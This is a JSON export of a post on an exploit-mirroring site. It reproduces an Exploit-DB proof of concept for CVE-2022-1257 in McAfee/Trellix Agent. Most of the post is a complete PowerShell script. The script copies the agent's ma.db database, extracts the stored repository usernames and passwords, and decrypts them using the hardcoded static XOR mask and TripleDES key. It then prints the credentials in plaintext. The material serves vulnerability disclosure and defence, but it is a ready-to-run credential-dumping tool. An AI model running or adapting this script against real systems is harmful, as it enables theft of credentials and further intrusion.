{"id":7316,"date":"2025-06-29T10:34:03","date_gmt":"2025-06-29T10:34:03","guid":{"rendered":"http:\/\/localhost\/?p=7316"},"modified":"2025-06-29T10:34:03","modified_gmt":"2025-06-29T10:34:03","slug":"mcafee-agent-576-insecure-storage-of-sensitive-information","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=7316","title":{"rendered":"McAfee Agent 5.7.6 &#8211; Insecure Storage of Sensitive Information"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">McAfee Agent 5.7.6 &#8211; Insecure Storage of Sensitive Information<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">EDB-ID:52345<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">exploitdb<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-06-26T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-06-26T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">6.1<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #ffaa00; font-weight: bold;\">MEDIUM<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:L\/A:N<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<li>CVE-2022-1257<\/li>\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\nExploit Title: McAfee Agent 5.7.6 &#8211; Insecure Storage of Sensitive Information Date: 24 June&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\nExploit Title: McAfee Agent 5.7.6 &#8211; Insecure Storage of Sensitive Information<br \/>\n<br \/>Date: 24 June 2025<br \/>\n<br \/>Exploit Author: Keenan Scott<br \/>\n<br \/>Vendor Homepage: hxxps[:\/\/]www[.]mcafee[.]com\/<br \/>\n<br \/>Software Download: N\/A (Unable to find)<br \/>\n<br \/>Version: < 5.7.6\n<br \/>Tested on: Windows 11<br \/>\n<br \/>CVE: CVE-2022-1257<\/p>\n<p><#\n<br \/>.SYNOPSIS<br \/>\n<br \/>    Dump and decrypt encrypted Windows credentials from Trellix Agent Database (&#8220;C:\\ProgramData\\McAfee\\Agent\\DB\\ma.db&#8221;) &#8211; PoC for CVE-2022-1257. Made by scottk817<\/p>\n<p>.DESCRIPTION<br \/>\n<br \/>    This script demonstrates exploitation of CVE-2022-1257, a vulnerability in McAfee&#8217;s Trellix Agent Database where attackers can retrieve and decrypt credentials from the `ma.db` database file.<\/p>\n<p>.LINK<br \/>\n<br \/>    https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2022-1257<br \/>\n<br \/>    https:\/\/github.com\/funoverip\/mcafee-sitelist-pwd-decryption\/blob\/master\/mcafee_sitelist_pwd_decrypt.py<br \/>\n<br \/>    https:\/\/mrd0x.com\/abusing-mcafee-vulnerabilities-misconfigurations\/<br \/>\n<br \/>    https:\/\/tryhackme.com\/room\/breachingad<\/p>\n<p>.OUTPUTS<br \/>\n<br \/>    CSV in stdOut:<br \/>\n<br \/>        Username,Password<br \/>\n<br \/>#><\/p>\n<p># Arguments<br \/>\n<br \/>[CmdletBinding()]<br \/>\n<br \/>param (<br \/>\n<br \/>    [string]$DbSource = &#8216;C:\\ProgramData\\McAfee\\Agent\\DB\\ma.db&#8217;,<br \/>\n<br \/>    [string]$TempFolder = $env:TEMP<br \/>\n<br \/>)<\/p>\n<p>### Initialize use of WinSQLite3 ###<br \/>\n<br \/>$cls = &#8220;WinSQLite_{0}&#8221; -f ([guid]::NewGuid().ToString(&#8216;N&#8217;))<\/p>\n<p>$code = @&#8221;<br \/>\n<br \/>using System;<br \/>\n<br \/>using System.Runtime.InteropServices;<\/p>\n<p>public static class $cls<br \/>\n<br \/>{<br \/>\n<br \/>    public const int SQLITE_OK  = 0;<br \/>\n<br \/>    public const int SQLITE_ROW = 100;<\/p>\n<p>    [DllImport(&#8220;winsqlite3.dll&#8221;, CallingConvention = CallingConvention.Cdecl)]<br \/>\n<br \/>    public static extern int sqlite3_open_v2(<br \/>\n<br \/>        [MarshalAs(UnmanagedType.LPStr)] string filename,<br \/>\n<br \/>        out IntPtr db,<br \/>\n<br \/>        int flags,<br \/>\n<br \/>        IntPtr vfs<br \/>\n<br \/>    );<\/p>\n<p>    [DllImport(&#8220;winsqlite3.dll&#8221;, CallingConvention = CallingConvention.Cdecl)]<br \/>\n<br \/>    public static extern int sqlite3_close(IntPtr db);<\/p>\n<p>    [DllImport(&#8220;winsqlite3.dll&#8221;, CallingConvention = CallingConvention.Cdecl)]<br \/>\n<br \/>    public static extern int sqlite3_prepare_v2(<br \/>\n<br \/>        IntPtr db, string sql, int nByte,<br \/>\n<br \/>        out IntPtr stmt, IntPtr pzTail<br \/>\n<br \/>    );<\/p>\n<p>    [DllImport(&#8220;winsqlite3.dll&#8221;, CallingConvention = CallingConvention.Cdecl)]<br \/>\n<br \/>    public static extern int sqlite3_step(IntPtr stmt);<\/p>\n<p>    [DllImport(&#8220;winsqlite3.dll&#8221;, CallingConvention = CallingConvention.Cdecl)]<br \/>\n<br \/>    public static extern IntPtr sqlite3_column_text(IntPtr stmt, int col);<\/p>\n<p>    [DllImport(&#8220;winsqlite3.dll&#8221;, CallingConvention = CallingConvention.Cdecl)]<br \/>\n<br \/>    public static extern int sqlite3_finalize(IntPtr stmt);<br \/>\n<br \/>}<br \/>\n<br \/>&#8220;@<\/p>\n<p># SQL statement to retrieve usersnames and encrypted passwords from ma.db<br \/>\n<br \/>$sql = @&#8221;<br \/>\n<br \/>SELECT AUTH_USER, AUTH_PASSWD<br \/>\n<br \/>FROM AGENT_REPOSITORIES<br \/>\n<br \/>WHERE AUTH_PASSWD IS NOT NULL;<br \/>\n<br \/>&#8220;@<\/p>\n<p>Add-Type -TypeDefinition $code -PassThru | Out-Null<br \/>\n<br \/>$type = [type]$cls<\/p>\n<p>### Decode and Decrypt ###<br \/>\n<br \/># Function to decode, and decrypt the credentials found in the DB using the static keys used for every Trellix agent.<br \/>\n<br \/>function Invoke-McAfeeDecrypt {<br \/>\n<br \/>    param([string]$B64)<\/p>\n<p>    [byte[]]$mask = 0x12,0x15,0x0F,0x10,0x11,0x1C,0x1A,0x06,<br \/>\n<br \/>                    0x0A,0x1F,0x1B,0x18,0x17,0x16,0x05,0x19<br \/>\n<br \/>    [byte[]]$buf = [Convert]::FromBase64String($B64.Trim())<br \/>\n<br \/>    for ($i = 0; $i -lt $buf.Length; $i++) {<br \/>\n<br \/>        $buf[$i] = $buf[$i] -bxor $mask[$i % $mask.Length]<br \/>\n<br \/>    }<\/p>\n<p>    $sha = [System.Security.Cryptography.SHA1]::Create()<br \/>\n<br \/>    [byte[]]$key = $sha.ComputeHash([Text.Encoding]::ASCII.GetBytes(&#8220;<!@#$%^>&#8220;)) + (0..3 | ForEach-Object { 0 })<\/p>\n<p>    $tdes = [System.Security.Cryptography.TripleDES]::Create()<br \/>\n<br \/>    $tdes.Mode = &#8216;ECB&#8217;<br \/>\n<br \/>    $tdes.Padding = &#8216;None&#8217;<br \/>\n<br \/>    $tdes.Key = $key<br \/>\n<br \/>    [byte[]]$plain = $tdes.CreateDecryptor().TransformFinalBlock($buf, 0, $buf.Length)<\/p>\n<p>    $i = 0<br \/>\n<br \/>    while ($i -lt $plain.Length -and $plain[$i] -ge 0x20 -and $plain[$i] -le 0x7E) {<br \/>\n<br \/>        $i++<br \/>\n<br \/>    }<br \/>\n<br \/>    if ($i -eq 0) { return &#8221; }<br \/>\n<br \/>    [Text.Encoding]::UTF8.GetString($plain, 0, $i)<br \/>\n<br \/>}<\/p>\n<p>### Copy ma.db ###<br \/>\n<br \/># Copy ma.db over to temp directory add GUID incase it already exists there.<br \/>\n<br \/>$tmp = Join-Path $TempFolder (&#8220;ma_{0}.db&#8221; -f ([guid]::NewGuid()))<br \/>\n<br \/>Copy-Item -LiteralPath $DbSource -Destination $tmp -Force<\/p>\n<p>### Pull records ###<br \/>\n<br \/>$dbPtr = [IntPtr]::Zero<br \/>\n<br \/>$stmtPtr = [IntPtr]::Zero<br \/>\n<br \/>$flags = 1<br \/>\n<br \/>$rc = $type::sqlite3_open_v2($tmp, [ref]$dbPtr, $flags, [IntPtr]::Zero)<\/p>\n<p>if ($rc -ne $type::SQLITE_OK) {<br \/>\n<br \/>    $msg = [Runtime.InteropServices.Marshal]::PtrToStringAnsi(<br \/>\n<br \/>        $type::sqlite3_errmsg($dbPtr))<br \/>\n<br \/>    Throw &#8220;sqlite3_open_v2 failed (code $rc) : $msg&#8221;<br \/>\n<br \/>}<\/p>\n<p>$rc = $type::sqlite3_prepare_v2($dbPtr, $sql, -1, [ref]$stmtPtr, [IntPtr]::Zero)<\/p>\n<p>if ($rc -ne $type::SQLITE_OK) {<br \/>\n<br \/>    $msg = [Runtime.InteropServices.Marshal]::PtrToStringAnsi(<br \/>\n<br \/>        $type::sqlite3_errmsg($dbPtr))<br \/>\n<br \/>    $type::sqlite3_close($dbPtr) | Out-Null<br \/>\n<br \/>    Throw &#8220;sqlite3_prepare_v2 failed (code $rc) : $msg&#8221;<br \/>\n<br \/>}<\/p>\n<p>$buffer = [System.Collections.Generic.List[string]]::new()<br \/>\n<br \/>while ($type::sqlite3_step($stmtPtr) -eq $type::SQLITE_ROW) {<br \/>\n<br \/>    $uPtr = $type::sqlite3_column_text($stmtPtr, 0)<br \/>\n<br \/>    $pPtr = $type::sqlite3_column_text($stmtPtr, 1)<\/p>\n<p>    $user = [Runtime.InteropServices.Marshal]::PtrToStringAnsi($uPtr)<br \/>\n<br \/>    $pass = [Runtime.InteropServices.Marshal]::PtrToStringAnsi($pPtr)<\/p>\n<p>    if ($user -and $pass) {<br \/>\n<br \/>        $buffer.Add(&#8220;$user,$pass&#8221;)<br \/>\n<br \/>    }<br \/>\n<br \/>}<\/p>\n<p>### Cleanup ###<br \/>\n<br \/># Finish and close SQL<br \/>\n<br \/>$type::sqlite3_finalize($stmtPtr) | Out-Null<br \/>\n<br \/>$type::sqlite3_close($dbPtr) | Out-Null<\/p>\n<p># Delete the ma.db file copied to the temp file<br \/>\n<br \/>Remove-Item $tmp -Force -ErrorAction SilentlyContinue<\/p>\n<p>### Process encrypted credentials ###<br \/>\n<br \/># For each row of credentials decrypt them and print plaintext to standard out.<br \/>\n<br \/>foreach ($line in $buffer) {<br \/>\n<br \/>    $rec = $line -split &#8216;,&#8217;, 2<br \/>\n<br \/>    if ($rec.Length -eq 2) {<br \/>\n<br \/>        $username = $rec[0]<br \/>\n<br \/>        try {<br \/>\n<br \/>            $password = Invoke-McAfeeDecrypt $rec[1]<br \/>\n<br \/>        } catch {<br \/>\n<br \/>            $password = &#8220;[DECRYPT-ERROR] $_&#8221;<br \/>\n<br \/>        }<br \/>\n<br \/>        &#8220;Username,Password&#8221;<br \/>\n<br \/>        &#8220;$username,$password&#8221;<br \/>\n<br \/>    }<br \/>\n<br \/>}\n<\/div>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/52345\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title McAfee Agent 5.7.6 &#8211; Insecure Storage of Sensitive Information Exploit ID EDB-ID:52345 Type exploitdb Published 2025-06-26T00:00:00 Modified 2025-06-26T00:00:00 CVSS&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,31,12,40,21,13,7,11,5],"class_list":["post-7316","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-61","tag-exploit","tag-exploitdb","tag-medium","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>McAfee Agent 5.7.6 - Insecure Storage of Sensitive Information - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=7316\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"McAfee Agent 5.7.6 - Insecure Storage of Sensitive Information - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title McAfee Agent 5.7.6 &#8211; Insecure Storage of Sensitive Information Exploit ID EDB-ID:52345 Type exploitdb Published 2025-06-26T00:00:00 Modified 2025-06-26T00:00:00 CVSS...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=7316\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-06-29T10:34:03+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7316#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7316\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"McAfee Agent 5.7.6 &#8211; Insecure Storage of Sensitive Information\",\"datePublished\":\"2025-06-29T10:34:03+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7316\"},\"wordCount\":115,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-6.1\",\"exploit\",\"exploitdb\",\"MEDIUM\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=7316#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7316\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7316\",\"name\":\"McAfee Agent 5.7.6 - Insecure Storage of Sensitive Information - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-06-29T10:34:03+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7316#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=7316\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7316#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"McAfee Agent 5.7.6 &#8211; Insecure Storage of Sensitive Information\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"McAfee Agent 5.7.6 - Insecure Storage of Sensitive Information - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=7316","og_locale":"en_US","og_type":"article","og_title":"McAfee Agent 5.7.6 - Insecure Storage of Sensitive Information - zero redgem","og_description":"Exploit Details Basic Information Exploit Title McAfee Agent 5.7.6 &#8211; Insecure Storage of Sensitive Information Exploit ID EDB-ID:52345 Type exploitdb Published 2025-06-26T00:00:00 Modified 2025-06-26T00:00:00 CVSS...","og_url":"https:\/\/zero.redgem.net\/?p=7316","og_site_name":"zero redgem","article_published_time":"2025-06-29T10:34:03+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=7316#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=7316"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"McAfee Agent 5.7.6 &#8211; Insecure Storage of Sensitive Information","datePublished":"2025-06-29T10:34:03+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=7316"},"wordCount":115,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-6.1","exploit","exploitdb","MEDIUM","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=7316#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=7316","url":"https:\/\/zero.redgem.net\/?p=7316","name":"McAfee Agent 5.7.6 - Insecure Storage of Sensitive Information - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-06-29T10:34:03+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=7316#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=7316"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=7316#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"McAfee Agent 5.7.6 &#8211; Insecure Storage of Sensitive Information"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/7316","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7316"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/7316\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7316"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7316"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7316"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}